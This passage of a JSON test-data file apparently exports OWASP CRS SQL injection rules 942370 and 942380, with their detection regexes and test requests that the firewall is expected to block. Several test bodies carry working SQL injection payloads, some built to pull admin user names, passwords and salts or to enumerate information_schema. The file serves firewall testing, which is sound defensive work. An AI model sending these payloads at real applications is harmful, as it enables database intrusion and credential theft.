"act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1072, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1073, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1074, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1075, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1076, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1077, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1078, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1059 } }, { "rule_id": "942370", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "REQUEST_HEADERS", "part": "Referer", "negated": false }, { "name": "REQUEST_HEADERS", "part": "User-Agent", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)[\\\"'`](?:[\\s\\x0b]*?(?:(?:\\*.+(?:x?or|div|like|between|(?:an|i)d)[^0-9A-Z_a-z]*?[\\\"'`]|(?:x?or|div|like|between|and)[\\s\\x0b][^0-9]+[\\-0-9A-Z_a-z]+[^0-9]*)[0-9]|[^\\s\\x0b0-9\\?A-Z_a-z]+[\\s\\x0b]*?[^\\s\\x0b0-9A-Z_a-z]+[\\s\\x0b]*?[\\\"'`]|[^\\s\\x0b0-9A-Z_a-z]+[\\s\\x0b]*?[^A-Z_a-z](?:[^#]*#|.*?--))|[^\\*]*\\*[\\s\\x0b]*?[0-9])|\\^[\\\"'`]|[%\\(-\\+\\-<>][\\-0-9A-Z_a-z]+[^\\s\\x0b0-9A-Z_a-z]+[\\\"'`][^,]", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects classic SQL injection probings 2/3", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "[\\\"'`]\\s*?\\*.+or\\W*?[\\\"'`]\\d\n[\\\"'`]\\s*?\\*.+xor\\W*?[\\\"'`]\\d\n[\\\"'`]\\s*?\\*.+div\\W*?[\\\"'`]\\d\n[\\\"'`]\\s*?\\*.+like\\W*?[\\\"'`]\\d\n[\\\"'`]\\s*?\\*.+between\\W*?[\\\"'`]\\d\n[\\\"'`]\\s*?\\*.+and\\W*?[\\\"'`]\\d\n", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=' * from = 1 or '9" }, "expected": { "should_block": true, "rule_ids": [ 942370 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=' * from = 1 or '9" } ] }, { "description": "[\\\"'`]\\s*?\\*.+id\\W*?[\\\"'`]\\d\n", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=' * from = 1 id '9" }, "expected": { "should_block": true, "rule_ids": [ 942370 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=' * from = 1 id '9" } ] }, { "description": "[^\\w\\s?]+\\s*?[^\\w\\s]+\\s*?[\\\"'`\"]\n", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=' = # '" }, "expected": { "should_block": true, "rule_ids": [ 942370 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=' = # '" } ] }, { "description": "[^\\w\\s]+\\s*?[\\W\\d].*?#\n", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=' ? # = #" }, "expected": { "should_block": true, "rule_ids": [ 942370 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=' ? # = #" } ] }, { "description": "[^\\w\\s]+\\s*?[\\W\\d].*?--\n", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var='? # = --" }, "expected": { "should_block": true, "rule_ids": [ 942370 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var='? # = --" } ] }, { "description": "[\\\"'`]\\s*?or\\s[^\\d]+[\\w-]+.*?\\d\n[\\\"'`]\\s*?xor\\s[^\\d]+[\\w-]+.*?\\d\n[\\\"'`]\\s*?div\\s[^\\d]+[\\w-]+.*?\\d\n[\\\"'`]\\s*?like\\s[^\\d]+[\\w-]+.*?\\d\n[\\\"'`]\\s*?between\\s[^\\d]+[\\w-]+.*?\\d\n[\\\"'`]\\s*?and\\s[^\\d]+[\\w-]+.*?\\d\n", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=' or homer 9" }, "expected": { "should_block": true, "rule_ids": [ 942370 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=' or homer 9" } ] }, { "description": "\\^[\\\"'`]\n", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=^'" }, "expected": { "should_block": true, "rule_ids": [ 942370 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=^'" } ] }, { "description": "[\\\"'`].*?\\*\\s*?\\d\n", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=\"` * 12344" }, "expected": { "should_block": true, "rule_ids": [ 942370 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=\"` * 12344" } ] }, { "description": "[()\\*<>%+-][\\w-]+[^\\w\\s]+[\\\"'`][^,]\n", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=>foo##'." }, "expected": { "should_block": true, "rule_ids": [ 942370 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=>foo##'." } ] }, { "description": "", "test_id": 10, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "1\"and json_search (json_array(password),0b11000010110110001101100,\"t_______________\")#", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942370 ] }, "malicious_patterns": [ { "location": "header_user-agent", "value": "1\"and json_search (json_array(password),0b11000010110110001101100,\"t_______________\")#" } ] }, { "description": "encode(lo_get(16400),'base64')::int", "test_id": 11, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "encode(lo_get(16400),'base64')::int", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942370 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 1091, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_HEADERS", "variable_part": "Referer", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_HEADERS", "variable_part": "User-Agent", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)[\\\"'`](?:[\\s\\x0b]*?(?:(?:\\*.+(?:x?or|div|like|between|(?:an|i)d)[^0-9A-Z_a-z]*?[\\\"'`]|(?:x?or|div|like|between|and)[\\s\\x0b][^0-9]+[\\-0-9A-Z_a-z]+[^0-9]*)[0-9]|[^\\s\\x0b0-9\\?A-Z_a-z]+[\\s\\x0b]*?[^\\s\\x0b0-9A-Z_a-z]+[\\s\\x0b]*?[\\\"'`]|[^\\s\\x0b0-9A-Z_a-z]+[\\s\\x0b]*?[^A-Z_a-z](?:[^#]*#|.*?--))|[^\\*]*\\*[\\s\\x0b]*?[0-9])|\\^[\\\"'`]|[%\\(-\\+\\-<>][\\-0-9A-Z_a-z]+[^\\s\\x0b0-9A-Z_a-z]+[\\\"'`][^,]", "actions": [ { "act_name": "id", "lineno": 1092, "act_quote": "no_quote", "act_arg": "942370", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1093, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1094, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1095, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1096, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1096, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1097, "act_quote": "quotes", "act_arg": "Detects classic SQL injection probings 2/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1098, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1099, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1100, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1101, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1102, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1103, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1104, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1105, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1106, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1107, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1108, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1109, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1110, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1091 } }, { "rule_id": "942380", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES", "part": "/_pk_ref/", "negated": true }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)\\b(?:having\\b(?:[\\s\\x0b]+(?:[0-9]{1,10}|'[^=]{1,10}')[\\s\\x0b]*?[<->]| ?(?:[0-9]{1,10} ?[<->]+|[\\\"'][^=]{1,10}[ \\\"'<-\\?\\[]+))|ex(?:ecute(?:\\(|[\\s\\x0b]{1,5}[\\$\\.0-9A-Z_a-z]{1,5}[\\s\\x0b]{0,3})|ists[\\s\\x0b]*?\\([\\s\\x0b]*?select\\b)|(?:create[\\s\\x0b]+?table.{0,20}?|like[^0-9A-Z_a-z]*?char[^0-9A-Z_a-z]*?)\\()|select.*?case|from.*?limit|order[\\s\\x0b]by|exists[\\s\\x0b](?:[\\s\\x0b]select|s(?:elect[^\\s\\x0b](?:if(?:null)?[\\s\\x0b]\\(|top|concat)|ystem[\\s\\x0b]\\()|\\bhaving\\b[\\s\\x0b]+[0-9]{1,10}|'[^=]{1,10}')", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "SQL Injection Attack", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "SQL Injection Attack", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "from `db_miwf`.`sys_refindex` limit" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "from `db_miwf`.`sys_refindex` limit" } ] }, { "description": "SQL Injection Attack", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" } ] }, { "description": "SQL Injection Attack", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "from `information_schema`.tables limit" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "from `information_schema`.tables limit" } ] }, { "description": "SQL Injection Attack", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "ORder by" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "ORder by" } ] }, { "description": "SQL Injection Attack", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "ordeR by" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "ordeR by" } ] }, { "description": "SQL Injection Attack", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "SELECT (CASE" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "SELECT (CASE" } ] }, { "description": "SQL Injection Attack", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" } ] }, { "description": "SQL Injection Attack", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" } ] }, { "description": "SQL Injection Attack", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" } ] }, { "description": "SQL Injection Attack", "test_id": 10, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" } ] }, { "description": "SQL Injection Attack", "test_id": 11, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "SELECT CONCAT(0x717a786a71,(SELECT (CASE" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "SELECT CONCAT(0x717a786a71,(SELECT (CASE" } ] }, { "description": "SQL Injection Attack", "test_id": 12, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" } ] }, { "description": "SQL Injection Attack", "test_id": 13, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" } ] }, { "description": "SQL Injection Attack", "test_id": 14, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "SELECT 'qzxjq'||(SELECT (CASE" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "SELECT 'qzxjq'||(SELECT (CASE" } ] }, { "description": "SQL Injection Attack", "test_id": 15, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "execute php" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "execute php" } ] }, { "description": "SQL Injection Attack", "test_id": 16, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" } ] }, { "description": "SQL Injection Attack", "test_id": 17, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "Execute(" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "Execute(" } ] }, { "description": "SQL Injection Attack", "test_id": 18, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" } ] }, { "description": "SQL Injection Attack", "test_id": 19, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" } ] }, { "description": "SQL Injection Attack", "test_id": 20, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" } ] }, { "description": "SQL Injection Attack", "test_id": 21, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" } ] }, { "description": "SQL Injection Attack", "test_id": 22, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "HAVING+1%3D" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "HAVING+1%3D" } ] }, { "description": "SQL Injection Attack", "test_id": 23, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "execute+elysi" }, "expected": { "should_block": true, "rule_ids": [ 942380 ] }, "malicious_patterns": [ { "location": "post_body", "value": "execute+elysi" } ] }, { "description": "SQL Injection Attack", "test_id": 24, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": 